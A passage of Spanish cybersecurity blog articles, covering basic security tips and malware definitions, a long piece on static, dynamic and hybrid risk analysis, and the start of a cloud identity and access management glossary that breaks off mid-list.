nuestras cuentas en línea y obtendrán más de nuestros datos personales. Continuarán de una cuenta a otra hasta que tengan suficiente información que les permita acceder a nuestros datos bancarios o simplemente robar nuestra identidad. Debemos tener cuidado con los tableros de mensajes y las redes sociales. Bloquear todas nuestras configuraciones de privacidad y evitar usar nuestro nombre real o identidad en los foros de debate. 1. No usar Wi-Fi abierto. - Cuando nos encontremos en la cafetería local, la biblioteca y especialmente el aeropuerto, no debemos usar el Wi-Fi abierto (sin contraseña ni cifrado) "gratuito". Pensémolo. Si puede acceder sin problemas, ¿qué puede hacer un individuo malicioso entrenado? 1. Haz una copia de seguridad de los archivos. - Lo mejor que puede hacer es hacer una copia de seguridad de los archivos, todos ellos. Idealmente, tendremos nuetsros archivos (sus datos) en al menos tres lugares: en el lugar donde trabaja en ellos, en un dispositivo de almacenamiento por separado y otro fuera del sitio de trabajo. Debemos mantener nuestros archivos en el PC, hacer una copia de seguridad de ellos en un disco duro externo y luego hacer una copia de respaldo en una ubicación diferente. 1. Usa múltiples contraseñas fuertes. - Nunca use la misma contraseña. Por lo general, utilizamos la misma dirección de correo electrónico o nombre de usuario para todas nuestras cuentas. Si se usa la misma contraseña para todo, o en muchas cosas, y la misma se "rompe", solo demorará unos segundos a un hackear para entrar en la cuenta. Usa minúsculas, mayúsculas, números y símbolos en la contraseña. Haz una contraseña fácil de recordar pero difícil de adivinar. ## 22. Adware Adware, o software respaldado por publicidad, es cualquier paquete de software que reproduce, muestra o descarga publicidades en una computadora automáticamente después de instalar el software o mientras se usa la aplicación. Las funciones de publicidad se integran o se incluyen con el software, que a menudo está diseñado para indicar qué sitios de Internet visita el usuario y para presentar la publicidad pertinente a los tipos de productos o servicios que allí aparecen. ## 23. Spyware El software espía es un tipo de malware que se instala en las computadoras y recopila pequeñas porciones de información a la vez sobre los usuarios sin su conocimiento. La presencia de spyware generalmente está oculta para el usuario y puede ser difícil de detectar. Normalmente, el spyware se instala secretamente en el PC personal del usuario. A veces, sin embargo, los spywares como key loggers son instalados por el propietario de un PC compartido, corporativa o pública a propósito para monitorizar en secreto a otros usuarios. ## 24. Troyanos Un troyano, a veces denominado caballo de Troya, es un malware no autorreplicante que parece realizar una función deseable para el usuario pero que en cambio facilitar el acceso no autorizado al sistema informático del usuario. ## 25. Root kit Un Root kit es un tipo de software que está diseñado para obtener el control de nivel de administrador sobre un sistema informático sin ser detectado. En prácticamente todos los casos, el propósito y el motivo es realizar operaciones maliciosas en un sistema informático host objetivo en una fecha posterior sin el conocimiento de los administradores o usuarios de ese sistema. Los Root kit se pueden instalar en hardware o software dirigidos en la BIOS, hipervisores, cargadores de arranque, kernel o, con menor frecuencia, bibliotecas o aplicaciones. --- # Análisis de riesgos estáticos , dinámicos e híbridos en ciberseguridad URL: https://ciberseguridad.blog/analisis-de-riesgos-estaticos-dinamicos-e-hibridos-en-ciberseguridad/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-01-13 Actualizado: 2026-10-04 Tema: Compliance > Armonizar el analisis estático con un analisis dinamico de una forma sensata, sera la mejor opción, optando por un análisis híbrido de riesgos. Los ciberataques ya no son eventos únicos, sino una campaña sostenida de atacantes cada vez más sofisticados que utilizan una combinación de ingeniería social y habilidades técnicas para penetrar en su red y obtener acceso a los activos más importantes. Este aumento en la complejidad y el nivel de habilidad del adversario significa que no hay una solución única para prevenir los ciberataques. El gasto de seguridad tradicional se centra en la introducción de otro producto protector, pero esto ya no es efectivo de forma aislada. Es necesario que haya una estrategia general de ciberseguridad centrada en la resiliencia cibernética e impulsada por un enfoque basado en amenazas que se centre en los activos clave de la organización y en las motivaciones y capacidades de los atacantes más probables. Los presupuestos de seguridad son limitados, y este enfoque permite enfocar estos recursos limitados de manera más efectiva para proteger los activos que con mayor probabilidad serán dirigidos. Con el fin de establecer una línea de base para una estrategia cibernética dirigida a amenazas, es útil realizar un ejercicio de análisis de amenaza y riesgo . La inteligencia de amenazas se usa para obtener una imagen del estado actual y los métodos que usan los atacantes. A largo plazo, esta información se puede comprar como una fuente de inteligencia de amenaza que nos proporcionara un análisis específico de nuestro sector. Sin embargo, esto requiere contar con personal que pueda comprender esta nformación, diseminarla en forma digerible a las personas adecuadas y actuar en consecuencia en términos de la estrategia general de ciberseguridad. En su lugar, podemos utilizar la consultoría para reemplazar la inteligencia de amenazas, aprovechando el conocimiento del consultor para proporcionar la inteligencia y el análisis específico. Este proceso debe ser colaborativo, trabajando junto a las personas clave del negocio que tienen el mayor conocimiento sobre cómo opera, qué activos se poseen y su criticidad para el mismo. El objetivo del proceso es establecer los activos clave, probables de ataques, sus motivaciones y capacidades, los controles que defienden estos activos y cómo podemos mitigar las vulnerabilidades que los afectan. [Vídeo](https://www.youtube.com/watch?v=knxhzpNFWGI) ## Análisis estático El primer paso es establecer cuáles serían los posibles objetivos de un ciberataque. Es probable que estos activos sean muy específicos para nuestra organización, y es por eso que es importante que el proceso de análisis de amenaza y riesgo sea colaborativo. Los atacantes cibernéticos sofisticados no se infiltran en nuestra red sin una intención específica, y esa intención generalmente es acceder a los datos almacenados que les interesan. El valor de esta información es relativo a la motivación del atacante. Por ejemplo, para un atacante nacional, la propiedad intelectual es un objetivo principal. Esto puede tener un valor limitado para un grupo de hacktivistas que se dirige a nuestro negocio porque su motivación es causar daño a nuetsra marca ó a la reputación. Para ellos, un activo clave podría ser el sistema de administración de contenido de nuestra web, que si se comprometiera les permitiría publicar su logotipo en nuestro sitio orientado al cliente. Una vez que se ha establecido una lista de activos clave, debemos determinar dónde están almacenados y quién tiene acceso a ellos. Es probable que los activos estén almacenados en muchos más lugares de lo que pensaríamos en un principio. Nuestros datos pueden almacenarse en un servidor de archivos en la red principal de la organización, pero este servidor también se respaldará en otro servidor. Habiendo mapeado la ubicación de los activos clave, ahora debemos establecer quién tiene acceso a ellos. Idealmente, queremos asegurarnos de que la cantidad mínima de personas tenga acceso a esta información. Esto se debe a que cuantas más personas tienen acceso, mayor es la superficie de ataque potencial, ya sea a través de un ataque interno (alguien con acceso legítimo a los datos lo compromete) o debido a un atacante externo que compromete la cuenta de un usuario. El número de personas que tienen acceso a los datos casi siempre es más estrictamente necesario; por ejemplo, el personal de TI generalmente tiene cuentas de superusuario que les permiten acceder a todos los datos en la red. ### Actores en las amenazas Los atacantes cibernéticos, o actores de amenazas, tienen distintas motivaciones y capacidades que impulsan los activos que buscarán comprometer y los métodos que utilizarán para lograr su objetivo. Los principales grupos de actores de amenazas son ciberdelincuentes, estados o nacionales, hacktivistas y expertos. Estos grupos se pueden expandir en subcategorías, y cada entidad distinta en estos grupos puede tener motivaciones y capacidades sutilmente diferentes. También es probable que haya agentes de amenazas adicionales que sean específicos de nuestra organización o sector, y estos pueden identificarse y analizarse durante el análisis de amenazas y riesgos. Luego, estos actores de amenazas se clasifican por orden de motivación, capacidad y probabilidad de que se dirijan a nosotros, asignando a cada uno un valor para determinar su amenaza general para la organización. Tomando como ejemplo a los ciberdelincuentes, están motivados principalmente por las ganancias y pueden ser altamente capaces,implementando malware personalizado para penetrar en nuestra red. Los activos a los que se dirigen serán cualquier información valiosa que pueda cifrarse , especialmente si también pueden encriptar las copias de seguridad. Su principal método sería mediante envío de correo electrónico phishing , utilizando técnicas de ingeniería social para engañar al personal y hacerle creer que el correo electrónico es una factura de proveedor legítima que debe pagarse, o un archivo adjunto que debe abrirse para luego encriptar la red con ransomware . Una vez completado, el análisis nos proporcionará una lista de los actores de amenaza más probables que se dirigirán a nuestra organización, y los métodos que emplean. Esto permitirá que la próxima etapa del análisis, que identifica controles y vulnerabilidades, se aborde con un enfoque en las amenazas más directas y viables. ### Controles y vulnerabilidades La resiliencia cibernética requiere que la organización tenga la capacidad de detectar y mitigar amenazas, pero también de poder monitorizar y responder a ataques cibernéticos exitosos. El análisis de amenazas y riesgos ha establecido los activos vitales de la organización y una lista priorizada de los actores amenazados, su motivación y sus capacidades. El siguiente paso es determinar los controles que ya existen para prevenir, detectar y responder a estas amenazas. Esto implica hablar con los sistemas TI y seguridad de la información. Al comparar estos controles con las capacidades y los métodos utilizados por los probables actores de amenaza, podemos identificar las vulnerabilidades que existen en ambos en los controles de procesos de la organización. El resultado del ejercicio es una lista de recomendaciones sobre cómo la organización puede abordar las vulnerabilidades que se identificaron para que puedan estar mejor preparadas para los ataques que es más probable a los que nos enfrentemos, utilizando la evaluación basada en amenazas de los diversos actores potenciales de amenaza. Estas recomendaciones también deberían formar la base de un marco de seguridad cibernética específicamente adaptado a nuestra organización, que pueda usarse para planificar la estrategia y el gasto de seguridad para los próximos años. ### Conclusiones del análisis estático Un análisis de amenazas y riesgos proporciona a la organización la información que necesita para enfocar correctamente la estrategia y presupuesto de seguridad. Ninguna organización puede defenderse contra cada amenaza concebible, y por lo tanto, tiene sentido priorizar las amenazas por los más propensos a enfocarse en nuestro negocio, y luego tomar decisiones informadas sobre cómo prevenir y detectar esas amenazas. Este enfoque debe integrarse en una estrategia de resiliencia cibernética que no solo permita a la organización prevenir estas amenazas, sino que también responda apropiadamente cuando sean atacadas las medidas de defensa. Pero el análisis de amenazas estatico no tiene en cuenta ciertas variables altamente cambiantes y de gran importantia, y por ello debemos buscar un punto acorde y adecuado entre este análisis y el análisis dinamico de amenazas que veremos a continuación. ## Análisis de riesgos dinámicos Es necesario para la empresa hacer una adecuada gestión de riesgos que le permita saber cuáles son las principales vulnerabilidades de sus activos de información y cuáles son las amenazas que podrían explotar las vulnerabildades. ### Concepto de evaluación de riesgos y gestión de riesgos La gestión de riesgos tiene como objetivo ayudar a las organizaciones, estableciendo prioridades y enfocando los recursos de seguridad para reducir la exposición al riesgo. Los riesgos, siendo muy diferentes en su naturaleza, pueden alcanzar una gran importancia cuando afecta a los sistmas de información, ya que hoy en día esto apoya en gran medida el estado de bienestar de nuestra sociedad. El proceso de gestión del riesgo se basa en la técnica de análisis de riesgo, definiéndose este, como el proceso que trata de identificar, analizar y evaluar, a través de una amplia gama de variables involucradas, eventos potenciales con un impacto medible en los objetivos de una organización. Implica un ejercicio de previsión, basado en datos históricos y racionales de análisis de eventos. Los resultados de los análisis de riesgos no están destinados a reemplazar las evidencias empíricas, pero por lo general no hay suficientes para proporcionar una buena idea sobre la exposición al riesgo. El juicio experto a menudo es una fuente relevante de información de gestión de riesgos sobre el tema, y los modelos basados en la teoría de probabilidad tradicional son comúnmente herramientas donde asumir el riesgo es un concepto dinámico que fluctúa con el tiempo en respuesta al entorno de evolución, donde se espera que la gestión de riesgos haga un seguimiento de los cambios para monitorizar sus efectos. Se puede hacer en base a una evaluación reiterada que permita contrastar los resultados posteriores de forma coherente. ### Evaluación de riesgos metodológicos de los sistemas de información La complejidad del análisis de riesgos crece junto con el entorno y la complejidad del sistema de información. La comprensión y la evaluación de los factores del análisis de riesgos conlleva cierto grado de subjetividad, siempre que no sea impulsado por datos objetivos u observación de hechos. Sin embargo, para que un análisis de riesgos sea más útil, debe ser preciso y permitir contraste y comparaciones con evaluaciones previas, en contra de evaluaciones hechas en entornos similares. Esta es la razón principal para adoptar un enfoque metodológico, que también disminuya el impacto de la subjetividad del analista en la evaluación. En todo el campo de las tecnologías de los sistemas de información, las metodologías de vanguardia, principalmente compatibles o patrocinadas por las siguientes organizaciones, son: - ISO 27005: 2011 (IEC - Internacional) - MAGERIT (Ministerio de la Administración Pública - España) - OCTAVE (Universidad SEI Carnegie Mellon - EE. UU.) - CRAMM (Siemens Insight Consulting - Reino Unido) - EBIOS (DCSSI - Francia) - IT Baseline Protection Manual (BSI - Alemania) - NIST SP800-30 (NIST - USA) Existen varias herramientas que aplican implícitamente algunas de estas metodologías y ayudan al proceso de análisis de riesgos. Tienden a ofrecer características tales como bases de conocimiento, flujos de trabajo, así como computación automática (Machine Learning) . El Inventario de la Agencia Europea de Seguridad de las Redes y la Información (ENISA) sobre evaluación de riesgos y las metodologías de gestión compilan las metodologías más reconocidas y sus herramientas asociadas. Estas interactúan y se interrelacionan por: - Bienes: No son solo hardware, redes o software (siempre relacionados con un sistema de información), sino también todo aquello apoyando por la infraestructura subyacente, como el personal (administradores, operadores, usuarios ...) o instalaciones. Puede incluir incluso cosas mucho más intangibles como la información, la imagen de marca o la reputación. Los bienes tienen un valor relativo para una organización, y a menudo están vinculados entre ellos, generando una jerarquía - Amenazas: Los eventos o causas raíz que pueden provocar un incidente, con resultados no deseados para una organización con objetivos materializados en daño o pérdida de activos. - Defectos: O debilidades en los procedimientos, diseño, implementación o controles de seguridad interna en los sistemas de información, que pueden ser explotado deliberadamente o accidentalmente - Impacto: Es el resultado de una amenaza que aprovecha las vulnerabilidades de los activos y, por lo tanto, causa una cierta degradación o pérdida del valor del activo. - Frecuencia: Probabilidad de que ocurra una o varias veces una amenaza durante un período de tiempo determinado. - Riesgo: Es la posibilidad de que una amenaza determinada explote una vulnerabilidad de un activo y por lo tanto cause daño a la organización. Las salvaguardas y el tratamiento de riesgos permiten reducir el riesgo a un cierto valor restante - Mitigación : Son medidas de seguridad (recursos o procedimientos) que de alguna manera mitigan el riesgo. Dependiendo de su naturaleza, pueden enfocarse en la prevención, protección, detección, aislamiento, confrontación, recuperación, etc. ## Análisis dinámico de riesgos Los cambios que suceden en los sistemas de información, modifican de alguna manera la imagen inicial. Esto implica que las primeras entradas en el análisis de riesgos no sean la mejor opción o sean distintas a las utilizadas para evaluar posteiormente la exposición al riesgo de los sistemas. Por lo tanto, la precisión de los resultados de los análisis de riesgos disminuyen y la incertidumbre aumenta con el tiempo. La gestión de riesgos necesita conocer esos cambios para poder ser efectivos al mitigar la exposición al riesgo y los estándares conocen este requisito. Internacional, la norma ISO 27001 obliga a hacerlo, bajo el concepto PDCA (Planificar, Hacer, Verificar, Actuar). Eso establece un ciclo donde el análisis de riesgo se repite durante períodos definidos de tiempo, y la planificación de la gestión de los mismos se adapta a el nuevo escenario de riesgo. El NIST (Instituto Nacional de Estándares y Tecnología) también define una metodología de seis pasos o procesos para gestionar los riesgos, la cual se itera durante todo el ciclo de vida de los sistemas informáticos. Sin embargo, este es un falso sentimiento de dinamismo ya que estas iteraciones tienen lugar en períodos de tiempo discretos (y generalmente largos). ### Evaluación dinámica del riesgo y su gestión Hay varios factores que deben tenerse en cuenta en gestión del riesgo, que están sujetos a aleatoriedad y dinamismo. Los cuales se pueden agrupar en 4 conjuntos: - Cambios en los sistemas de información: Principalmente adición, modificación o supresión de activos, así como alteraciones en los servicios de mantenimiento, recursos, proveedores y, por lo tanto, encendido, apoyando el sistemas de información; - Vulnerabilidades de día cero o nuevas amenazas detectadas: Pero también amenazas desconocidas y vulnerabilidades, que afectan los activos de la Organización. - Evolución de las amenazas ya conocidas y finalmente amenazas monitorizadas que causan un incidente - Medidas de seguridad o implementación de salvaguardas: Modifican el impacto esperado o la probabilidad de que una amenaza dañe un activo. Varios autores los definen como la simple reiteración discreta de riesgo de amenaza en períodos de tiempo definidos, de la misma manera que los estándares lo promueven con ciclos de gestión del riesgo. Cuando algo en el sistemas de información o su entorno sufre un cambio, las entradas del análisis de riesgos pueden ser alteradas para reflejarlo, arrojando nuevos resultados que puedan ayudar a asignar mejores recursos de seguridad en la organización. Dicha terminología la podemos ver en otros autores con términos como "Evaluación de riesgos en línea" o "Evaluación de riesgos en tiempo real" como sinónimo de la "Evaluación de riesgo dinámica". Aunque el Analisis de Riesgo Dinamico es el término más repetido, todos ellos se basan principalmente en una actualización periódica de las variables del análisis de riesgos que se definen el sistema de información y su ambiente. Ocasionalmente, la atención se traslada a la dinámica durante la fase de tratamiento de riesgo. Como vemos , tanto el el análisis estandar como en el dinámico los conceptos están mezclados o interrelacionados a veces. ### Evolución dinámica de la evaluación del riesgo 1. Entrada de Base de Datos La recopilación masiva de datos fidedignos y reales es realmente difícil de lograr, siendo uno de los principales inconvenientes del análisis de riesgos, y dificultando obtener un resultado realista del proceso. Debe estar especializado y ubicar fuentes de información confiables, que además deban actualizarse periódicamente. Hoy en día existen formatos estandarizados para intercambiar estos datos, dependiendo de la investigación tales como: CVE, NVD, CPE, OVAL, KML, CVSS, etc. Hoy en día existen varios repositorios de datos para uso abierto, incluso con el apoyo del gobierno, como es la Base de datos nacional de vulnerabilidad proporcionada por NIST. Básicamente se centra en la difusión de vulnerabilidades de los sistemas informáticos. Otras iniciativas intentan promover el intercambio de información (anónimamente cuando sea requerido) sobre amenazas, vulnerabilidades, intrusiones, incidentes de seguridad, etc. a través de CERT (Equipo de respuesta ante emergencias) o CSIRT (Equipos de respuesta a incidentes de seguridad informática). 1. Graficos de ataques Este enfoque intenta definir los patrones de ataque que un atacante podria seguir contra los sistemas . Los patrones capturan la dinámica de un ataque y las etapas que tiene que atravesar para alcanzar el objetivo final. Cuando se habla de seguridad física, cualquiera puede concebir una arquitectura defensiva con varias capas posteriores de protecciones (Muros, puertas blindadas, cajas de seguridad, etc.). y el atacante debe vencerlos a todos, o al menos a todos los que bloquean su camino, para alcanzar su objetivo. Los árboles de gráficos y de ataque muestran a su manera los caminos que conducen desde un atacante a un objetivo probable. Estas rutas están compuestas de nodos interconectados, y cada uno de los nodos es un paso (acción a ser hecho, vulnerabilidad a ser explotada, etc.) que el atacante debe completar para llegar al siguiente nodo. Puede haber varios caminos o ramas que llegan al mismo objetivo final. Cada nodo tiene una probabilidad asociada si el atacante tiene éxito, y el encadenamiento de probabilidades en todos los nodos y caminos da la probabilidad de que se logre el nodo objetivo final. Este tipo de análisis de riesgos se puede aplicar desde dos diferentes puntos de vista: - Simulación de crisis, donde hay escenarios de ataque con fines de entrenamiento. Se pueden usar para emular situaciones reales y dejar que el personal técnico o la administración desempeñen su papel. Esto no está contemplado en el análisis de riesgo dinamico. - Gestión dinámica del riesgo basada en la respuesta en tiempo real a incidentes de seguridad. Por lo tanto, no ha ser un marco de seguridad con sistemas capaces de detectar eventos de seguridad tales como IDS / IPS, dejando que la herramienta de análisis de riesgos sepa en qué etapa de desarrollo está el ataque (es decir: nodo exacto dentro del árbol / gráfico que el atacante ya logró). Este enfoque permite prever los próximos pasos esperado del atacante, donde el camino se puede endurecer para evitar su progreso. Aquí la estimación del riesgo se realiza comúnmente mediante el uso de Redes Bayesianas . Haciendo uso directo de Gráficos acíclicos (DAG) para establecer relaciones probabilísticas entre variables. El modelo hibrido jerárquico bayesiano coordinado (HCBM) también se puede aplicar para evaluar la probabilidad de eventos extremos, integrando varias bases de datos de conocimiento con respecto a esos eventos. [Imagen: Modelo HibridoJerárquico Bayesiano Coordinado HCBM] 1. Enfoque conjunto Las soluciones anteriores se centran en algunos asuntos importantes con respecto a la estimación del riesgo de sistemas de información, pero dejan el resto aparte. Algunas iniciativas se centran en el uso de árboles de ataque seguido de la planificación de mitigación basada en costo-beneficio (ROI), pero también tomando datos de la base de datos CVSS sobre vulnerabilidades y sus factores de explotación. 1. Control del estado de la seguridad de los sistemas La tendencia actual en la gestión de la seguridad de los sistemas es principalmente mediante un SIEM (Security Information and Event Management ). El SIEM ofrece características tales como gestión de registros, informes de cumplimiento, monitorización online y manejo de incidentes. Las arquitecturas SIEM generalmente se basan en IDS / IPS (intrusión Sistemas de Detección / Prevención) desplegados en toda la red, con el fin de rastrear actividad maliciosa dentro. La información recopilada puede ser útil para actualizar los árboles de ataque como ya indiqué. Sin embargo también puede ser valioso si se usa para evaluar metodológicamente el riesgo en tiempo real, según los cambios detectados y notificados por esos sistemas. Este empleo de análisis dinamico del riesgo es mucho más que un enfoque de alto nivel que los árboles de ataque, que básicamente están orientados al administrador del sistema. Bien repartidos, los IPS (DIPS) están personalizados para predecir los niveles de amenaza y actualizar la exposición al riesgo de los activos afectados mediante el uso de lógica difusa. El hecho de que DIPS monitorize la red en una arquitectura distribuida puede mejorar la predicción de amenazas, evaluando el riesgo basado en un estado de seguridad dado (Normal, Intento de Intrusión, Intrusión en Progreso o ataque exitoso). Esto, caracteriza un sistema dinámico donde la evolución futura solo depende de su estado actual, independientemente de los anteriores. Con ello, por ejemplo, nos encontramos con modelos como el IDAM & IRS, donde se evalúa cuantitativamente el riesgo en una intrusión. En primer lugar, dicho modelo filtra y correlaciona las alertas de IDS, luego evalúa el estado de riesgo de los activos (considerando el volumen, la relevancia, la confiabilidad y la tipología de las alertas). Finalmente, un administrador o sistema de respuesta de intrusión automática puede usar la evaluación para proporcionar mejores decisiones de respuesta. El riesgo se calcula en base a la combinación de diferentes pruebas para reducir la incertidumbre (teoría de la evidencia de DS). ### Tratamiento de riesgo dinámico - Optimización de riesgos con árboles de decisión Los árboles también se pueden utilizar para la selección de estrategias de mitigación de riesgos después de un cambio si ocurrer en nuestro entorno. Los árboles ya no reflejan el riesgo relacionado con un ataque. En su lugar, muestran la ruta más efectiva a seguir de mitigación, para minimizar el impacto causado por una alteración conocida. Hay caminos que se mueven a lo largo de diferentes acciones disponibles que se aplican en momentos en el tiempo. La mejor secuencia de acciones a seguir es la que termina en el nodo de menor riesgo. La generación de árboles de decisión podría requerir una proceso de aprendizaje supervisado. - Respuesta automatizada a incidentes basada en la percepción del riesgo La detección de incidentes a través de IDS / IPS (o cualquier otro sistema de seguridad) debería ser seguida idealmente por una reacción efectiva e inmediata siempre que sea posible. La automatización de esa reacción es el objetivo de Sistemas automatizados de respuesta de intrusiones (AIRS). La principal dificultad ha demostrado ser la capacidad de garantizar una respuesta más efectiva que la humana. Concebido para reaccionar automáticamente a las alertas de IDS, mediante la autorización de ejecución del sistema restricciones, basadas en el riesgo percibido. Estas restricciones se aplican al proceso afectado por el ataque. La respuesta automatizada a eventos tiene que lidiar con una debilidad importante como el tratamiento de los falsos positivos. Las medidas aplicadas sobre la base de un incidente de seguridad falso podrían dar lugar a un desperdicio de recursos, o incluso tener un impacto no deseado en los objetivos comerciales. Algunos esfuerzos intentan evitar este revés implementando el llamado modelo de fusión que pasa por tres consecutivos Fases o niveles: El primero es un algoritmo de fusión de alerta en línea que reduce la redundancia de alertas en orden para encontrar la causa raíz del incidente; El segundo maneja con factores de incertidumbre para obtener un mayor evaluación precisa; Y el último nivel evalúa dinámicamente el riesgo de la red al aplicar HMM (Hidden Markov Model) ## Análisis híbrido de riesgos Hay varios enfoques que intentan enfrentar los desafíos del análisis dinamico de riesgos y la gestión dinámica de los mismos, con diferentes puntos de vista. Tienden a enfocarse en un dilema específico, dejando otras pistas importantes desatendida, aunque algunas corrientes intentan solventar el problema desde un enfoque holístico. Idealmente, todos los cambios que sucedan en los sistemas de información, así como a los que afectan a nuestro entorno, deben tenerse en cuenta cuando evaluamos el riesgo, para que sea completo y efectivo. Los sistemas de análisis estáticos de riesgos, podrían mejorarse integrando los análisis con herramientas de monitorización de eventos en tiempo real, y finalmente automatizando las medidas de respuesta en línea con las políticas de gestión de riesgos. Desde el punto de vista de los sistemas de información, los IDS / IPS son las herramientas más extendidas que ofrecen características que permitirán una monitorización en tiempo real de las redes. De hecho, a veces ofrecen su propia evaluación del riesgo, vinculada a los eventos detectados. El principal inconveniente es la estrecha comprensión de todos los sistemas de información y su entorno global. Por otro lado, el análisis de riesgos tradicional, tiende a capturar un nivel superior del dominio de sistemas de información que permite la toma de decisiones en alineación con los objetivos de la organización, políticas de seguridad, etc. [Imagen: Análisis contínuo de riesgos] Finalmente, la integración de un análisis de riesgos dinámico en un dashboard de seguridad, traería la monitorización de riesgo de los sistemas de información y la toma de decisiones relacionadas con él (basado en análisis de riesgos en tiempo real), más cercano a la administración en el desafortunado caso de un escenario de crisis. Pero para ello, se requiere que las herramientas de análisis de riesgos sean alimentadas con entradas continuas sobre el estado de seguridad de los sistemas. > Armonizar el análisis estático con un análisis dinámico de una forma sensata, será la mejor opción, optando por un análisis híbrido --- # Identidad y control de accesos en Cloud URL: https://ciberseguridad.blog/identidad-y-control-de-accesos-en-la-cloud/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2018-01-09 Actualizado: 2026-10-04 Tema: Gestion de Identidades y Accesos > Tanto en la Cloud pública como privada, se requieren dos partes para administrar la Identidad y los Accesos sin comprometer la seguridad. !CONOCELAS¡ Tanto en la nube pública como privada, se requieren dos partes para administrar la Identidad y la gestión de Accesos sin comprometer la seguridad. La computación en la nube introduce múltiples cambios a la forma en que tradicionalmente hemos administrado IAM para sistemas internos. No es que estos sean necesariamente temas nuevos, sino que son cuestiones más importantes cuando se trata de la cloud. La diferencia clave es la relación entre el proveedor de la nube y el usuario de la nube, incluso en la nube privada. La gestión de identidad y el control de accesos no puede ser administrada únicamente por uno u otro y por lo tanto una relación de confianza y responsabilidades, requiere habilitar los mecanismos técnicos necesarios, donde en la mayoría de las veces esto se reduce a la federación. La cloud es un entorno que tiende a cambiar rápidamente con frecuencia, estar altamente distribuida (incluso a través de límites jurisdiccionales legales), aumentando la complejidad del plano de gestión y las comunicaciones de red, lo que abre las infraestructura de este tipo a los ataques. Todo ello, obtiene mucha más complejidad al existir amplias diferencias entre los distintos proveedores, los diferentes modelos de servicio y los distintos despliegues. ## ¿Por qué la gestion de identidad es distinta en cloud? La gestión de identidad y acceso siempre es complicada. En el kernel de todo esto, estamos mapeando alguna forma de entidad (persona, sistema, fragmento de código, etc.) a una identidad verificable asociada con varios atributos (que puede cambiar en función de las circunstancias actuales), tomando luego una decisión sobre lo que puede o no hacer basada en los derechos y los accesos que esta tiene. Incluso cuando controlas toda la cadena de ese proceso, administrar los distintos sistemas y la tecnologías de una manera segura y verificable, es un autentico desafío. Uno de loss principales problema en cloud, es que no se está gestionando la identidad y los acceso a los recursos, lo que puede complicar enormemente el proceso. Por ejemplo, imaginemos que tenemos que provisionar al mismo usuario en docenas o cientos de diferentes servicios Cloud. La federación es la herramienta principal utilizada para gestionar este problema, al crear relaciones de confianza entre las organizaciones y aplicarlas a través de tecnologías basadas en estándares. La federación y otras técnicas y tecnologías IAM llevan conviviendo con nosotros desde hace mucho tiempo, pero el problema de ello es que se han creado parches y silos de IAM a medida que los departamentos TI han ido evolucionado. La adopción de la cloud, pero impulsa rápidamente a las organizaciones a confrontar y actualizar las mejores prácticas de gestión de identidad y accesos para lidiar con las diferencias Cloud, trayendo consigo varias oportunidades y desafíos. La migración a la nube es una oportunidad para construir nuevas infraestructuras y procesos de arquitectura y estándares modernos. Se han producido enormes avances en identidad y accesos a lo largo de estos últimos años, sin embargo, la gran mayoria de organizaciones solo han podido implementarlos en casos de uso limitados debido principalmente a restricciones presupuestarias y de infraestructuras heredadas legacy. La adopción de computación en la nube, ya sea con un proyecto pequeño o una migración completa de nuestro CPD, significa la construcción de nuevos sistemas en nuevas infraestructuras que generalmente se diseñan utilizando las últimas prácticas de gestión de identidad. Pero no todo es tan sencillo, estos cambios también traen grandes desafíos consigo. Moverse a una federación a escala con múltiples partes internas y externas puede ser complejo y difícil de manejar debido a la pura matemática de todas las variables involucradas. La determinación y aplicación de atributos y derechos en sistemas y tecnologías dispares acarrea problemas tanto de proceso como técnicos. Incluso las decisiones arquitectónicas fundamentales pueden verse obstaculizadas por la amplia variación en el soporte entre proveedores y plataformas en la nube. ## Una visión general de la gestión de identidad La IAM es una amplia área de práctica con su propio léxico que puede ser confusa para aquellos que no son especialistas en la materia, especialmente, dado que algunos términos tienen diferentes significados en diferentes contextos. Incluso el término "IAM" (Identity and acess manager) no es universal y a menudo se lo denomina Gestión de identidad (IdM). Gartner define IAM como: > La disciplina de seguridad que permite a las personas adecuadas acceder a los recursos adecuados en el momento adecuado por las razones correctas" Antes de entrar en detalles, debemos conocer los términos más relevantes para continuar hablando de la gestión de identidad y accesos en Cloud: - Entidad: La persona o "cosa" que tendrá una identidad. Podría ser un individuo, un sistema, un dispositivo o un código de aplicación. - Identidad: La expresión única de una entidad dentro de un espacio de nombres dado. Una entidad puede tener múltiples identidades digitales, como una sola persona que tiene una identidad de trabajo, una identidad de redes sociales y una identidad personal. Por ejemplo, una sola entrada en un único servidor de directorio activo, sería una identidad. - Identificador: El medio por el cual se puede afirmar una identidad. Para las identidades digitales, esto a menudo es un token criptográfico. En el mundo real, podría ser el DNI. - Atributos: Facetas de una identidad. Los atributos pueden ser relativamente estáticos (como una unidad organizativa) o altamente dinámicos (dirección IP, dispositivo utilizado, si el usuario se autenticó con MFA, ubicación, etc.). - Persona: La expresión de una identidad con atributos que indica el contexto. Por ejemplo, un desarrollador que inicia sesión en el trabajo y luego se conecta a un entorno Cloud como desarrollador en un proyecto en particular. La identidad sigue siendo el individuo, y la persona es el individuo en el contexto de ese proyecto. - Rol: Las identidades pueden tener múltiples roles que indican el contexto. - Papel: Es un término confuso y usado en exceso que se usa de muchas maneras diferentes. Para nuestros propósitos, lo consideraremos similar a una persona, o como un subconjunto de una persona. Por ejemplo, un desarrollador dado en un proyecto, puede tener diferentes roles, tales como "superadmin" y "dev", que deberemos utilizar para tomar las decisiones de acceso. - Autenticación: El proceso de confirmación de una identidad. Cuando se inicia sesión en un sistema, se debe presenta un nombre de usuario (el identificador) y una contraseña (un atributo al que nos referimos como un factor de autenticación). También conocido como Authn. - Autenticación multifactorial (MFA): Uso de múltiples factores en la autenticación. Las opciones comunes incluyen contraseñas de un solo uso generadas por un dispositivo / token físico o virtual (OTP), validación fuera de banda a través de una OTP enviada por mensaje de texto, o confirmación desde un dispositivo móvil, datos biométricos o tokens de complemento. - Control de acceso: Restringir el acceso a un recurso. La administración de acceso es el proceso de administrar el acceso a los recursos. - Autorización: Permite un acceso de identidad a algo (por ejemplo, datos o una función). También conocido como Authz. - Derecho: Asignar una identidad (incluidos roles, personajes y atributos) a una autorización. El derecho es lo que están autorizados a hacer, y para fines de documentación los mantenemos en una matriz de derechos o roles. - Gestión de identidad federada: El proceso de afirmar una identidad en diferentes sistemas u organizaciones. Este es el habilitador clave de Single Sign On y también fundamental para administrar la gestión de identidad y accesos en Cloud. - Fuente autoritativa: La fuente "raíz" de una identidad, como el servidor de directorio que administra las identidades de los empleados. Un claro ejemplo nos vendría de RRHH. - 